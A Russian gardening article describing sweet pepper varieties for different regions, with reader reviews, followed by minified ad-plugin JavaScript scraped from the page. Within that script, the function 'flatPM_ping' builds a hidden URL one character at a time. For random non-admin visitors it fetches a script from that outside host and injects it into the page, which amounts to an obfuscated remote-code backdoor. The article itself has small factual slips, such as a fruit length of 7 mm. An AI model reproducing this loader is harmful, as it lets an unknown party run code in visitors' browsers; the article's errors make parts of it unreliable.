Описание и характеристика перца сорта Силач, отзывы, фото Раннеспелый, крупноплодный сорт болгарского перца для открытого грунта и пленочных укрытий. Куст полураскидистый, средней высоты. Лист среднего размера, зеленый, слабоморщинистый. Сладкий перец Силач включен в Гос. реестр по Российской Федер
Показать полностью.

Перец Сибирский формат

Описание и характеристика перца сорта Сибирский формат, отзывы, фото Среднеспелый, среднерослый, крупноплодный сорт болгарского перца. В средней полосе рекомендуется выращивать его в теплице. Куст полураскидистый, высотой около 80 см. Лист среднего размера, светло-зеленый, слабоморщинистый. Растени
Показать полностью.

Сорта перца сладкого толстостенного для теплиц и открытого грунта

Сладкий перец – это одна из самых востребованных овощных культур среди всех огородников. Такая популярность связана с большим количеством витаминов, содержащихся в составе перца. Чтобы вырастить растение в домашних условиях, необходимо правильно подобрать посадочный материал и сорт сладкого толстостенного перца В этом деле особу роль играет климат, который на разных территориях России различный.

Описание сладких толстостенных сортов перца для открытого грунта

Сладкий перец можно выращивать на открытой территории, но для этого посадочный материал должен быть устойчив к условиям погоды, которые время от времени меняются. Как правильно сажать сладкие сорта на рассаду узнайте в данной статье.

Абрикосовая фаворитка

Сорт раннеспелый. Куст имеет небольшую высоту, 40-50 см. Овощи имеют форму конуса, масса одного перца 100-120г, а толщина стенок – 7 мм.

Бивень

Сорт раннего созревания. Через 95 дней с момента всхода можно производить сбор урожая. Кусты высокорослые, их высота достигает 160 см. Плоды обладают массой 150 г, а толщина стенок 8 мм. Форма представлена в виде цилиндра, удлиненная. Произрастать перец может в условиях теплицы и на открытой местности. Какие лучшие ранние сорта для открытого грунта бывают, указано в статье.

Перец Биг папа

Сорт раннеспелый, куст имеет компактные размеры. Плоды характеризуются толстыми стенками, форма представлена в виде цилиндра. Масса одной перчины 100 г. Для этого сорта характерна отличная сопротивляемость к болезням и высокая урожайность. Какие Болгарские сладкие сорта для открытого грунта чаще всего используют, можно узнать из данной статьи.

Богатырь

Этот сорт среднеранний, обладает высоким урожаем. Длина одного перца достигает 7 мм, масса 150-180 г. Вкус у перца сладкий, сочный имеется нежный перечный аромат.

Бугай

Этот также считается раннеспелым. Высота куста может достигать 60 см. продукт толстостенный, кубовидной формы. Характерной особенностью остается быстрая созреваемость. Из данной статьи можно узнать после чего можно сажать перец в огороде.

Для теплиц

Сладкий перец отлично произрастает и дает отличный урожай в южных регионах. Но порой для тех областей, где погодные условия нестабильные, необходимо применять семена для выращивания сладкого перца в теплице.

Абрикосовая фаворитка

Данная культура очень часто используется для выращивания в условиях парника. Однако имеется опыт выращивания продукта на открытой местности. Куст имеет небольшую высоту, плоды представлены в виде конической форме. Масса одного перца составляет 120 г. Такой сорт является толстостенным, так как толщина стенок равняется 7 мм.

Созревший перец характеризуется достаточной сочностью. На одном кусте может произрастать 20 плодов. Причем созревание происходит дружно. Этот тип овощей может похвастаться стабильно высокой урожайностью. Применять продукт можно в свежем виде или для консервирования.

Увидеть фото посадки лука Китайским способом можно здесь.

Агаповский

Этот сорт считается раннеспелым. Куст средней высоты, имеются большое количество листвы. Плоды имеют большие размеры, а их поверхность гладкая. Форма перца имеет вид призму. Все хитрости выращивания лука порея в домашних условиях указаны в этом материале.

Данный сорт характеризуется сильным ароматом и приятными вкусовыми качествами. Масса одного плода 110-130 г, а толщина стенки – 7-8 мм. Сорт способен сопротивляться различным недугам. С м2 удается собрать до 10 кг продукта.

Атлант

Куст растения имеет малую высоту, которая достигает 80 см. Этот сорт считается идеальным вариантом для малых пленочных теплиц. Масса одного перца составляет 110-160 г.

Толщина стенок 10 мм. Перец обладает удлиненной формой, сочной мякотью и отличными вкусовыми качествами. Сорт отлично сопротивляется самым распространенным болезням.

Белладонна F1

Этот сорт относится к толстостенным гибридам, позволяющим раньше срока получить высокий урожай. Масса перца не так велика, она составляет 140-160 г. Форма продукта представлена в виде куба.

Для рассмотренного продукта свойственны отличные вкусовые особенности. Этот сорт не боится вирусного недуга. Выращивать культуру можно в теплице и на открытой местности.

Для Сибири и Урала

Для выращивания сладкого перца в условиях холодного климата целесообразно применять сорт Колобок. Эта культура характеризуется малой высотой куста. Плоды обладают отличными вкусовыми качествами, имеют округлую форму. Вес одного перца составят 100-160 г. Процесс созревания происходит дружно. Про посадку и уход за ежевикой на Урале читайте по этой ссылке.

На видео – сорта перца сладкого толстостенного:

Еще популярным считается сорт Ранее диво. Это растение обладает ранним созреванием. Сбор плодов происходит через 3 месяца. Форма перца представлена в виде призмы. Высота куста достигает отметки 120 см. противостоит вирусным недугам.

Не менее востребованным и интересным считается сорт Сладкий банан. Он имеет удивительные вкусовые качества, форма перца напоминает банан. Длина овоща 15-17 см. Следующий вариант посадочного материала носит название Золотая медаль. Плоды имеют длину до 13 см. Мякоть вкусная и нежная. Для сорта характерна высокая урожайность, масса плода 60-90г. Как вырастить корневой сельдерей читайте тут.

Для Подмосковья

Если вы будет выращивать сладкий перец в условиях климата Подмосковья, то можно воспользоваться следующими сортами:

  1. Фиделио. Процесс созревания происходит по прошествии 90 дней с момента всхода. Плоды большого размера. Сорт обладает высокой урожайностью.
  2. Оранжевое чудо. Этот сорт порадует садоводов своим высоким урожаем и крупными плодами. Масса одного перца составляет 250 г.
  3. Семко и Агаповский. Сорта обладают удивительными вкусовыми качествами. Такие плоды смогут украсить любой стол.
  4. Атлантика. Этот сорт можно выращивать как в теплице, так и на открытой местности. Растение отлично справляется с различными болезнями и низкой температурой.

На видео -лучшие суперранние сорта перца сладкого толстостенного:

Для Украины

Сегодня селекционеры смогли получить новые сорта сладкого перца, которые разрешено использовать для выращивания на территории Украины. В эту группу можно отнести такие сорта:

  1. Алеся. Плоды большого размера и приятного вкуса. Толщина стенки может достигать 7-8 мм. Применять плод можно во время технической зрелости, так и подождать полного созревания.
  2. Кубик. Основной особенностью этой культуры считается необычный вкус. Масса одного плода может достигать 250 г. При длительной транспортировке сладкий перец сохраняет свой товарный вид.
  3. Парнас. Сорт относится к среднеспелым. Овощ имеет форму куба или сердца. Окрас созревших плодов желто-оранжевый. Стенки имеют толщину 10 мм.

На видео – сорта перца сладкого толстостенного раннего для Сибири:

Отзывы

  • Инна: «Я выращиваю сладкий перец в условиях теплицы. Для этого использую сорт Атлант. Для него характерны компактные размеры, поэтому подвязывать куст нет необходимости. Уходи за культурой несложный. Я регулярно поливаю, рыхлю и удобряю грунт. Размер плодов крупные, масса одного достигает 150 г».
  • Марина: «Я выращиваю сладкий перец на открытой местности. Используя два вида: Бивень и Абрикосовая фаворитка. Эти два сорта позволяют получить просто отличный урожай. Куст имеют большую высоту, поэтому их необходимо подвязывать, чтобы стебель не сломался под влиянием крупных сортов. Вкус у зрелого сорта очень вкусный, емкость сладкая и плотная».
  • Александра: «Я проживают на территории Сибири, поэтому выращивать сладкий перец в открытом грунте для меня стало настоящим испытанием. Все мои проблемы были решены, когда я стала использовать сорт Колобок. Эта культура способна давать отличный урожай даже при суровом климате. Плоды крупные, масса одного примерно составит 120 г. Урожайность и вкусовые качества также находятся на высшем уровне».

Выращивать сладкий перец не так сложно, если правильно подобрать сорт. Уже верно подобранный посадочный материал – половина успеха. При выборе лучшего сорта для открытого грунта необходимо руководствоваться климатическими условиями, техникой ухода и личными предпочтениями.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};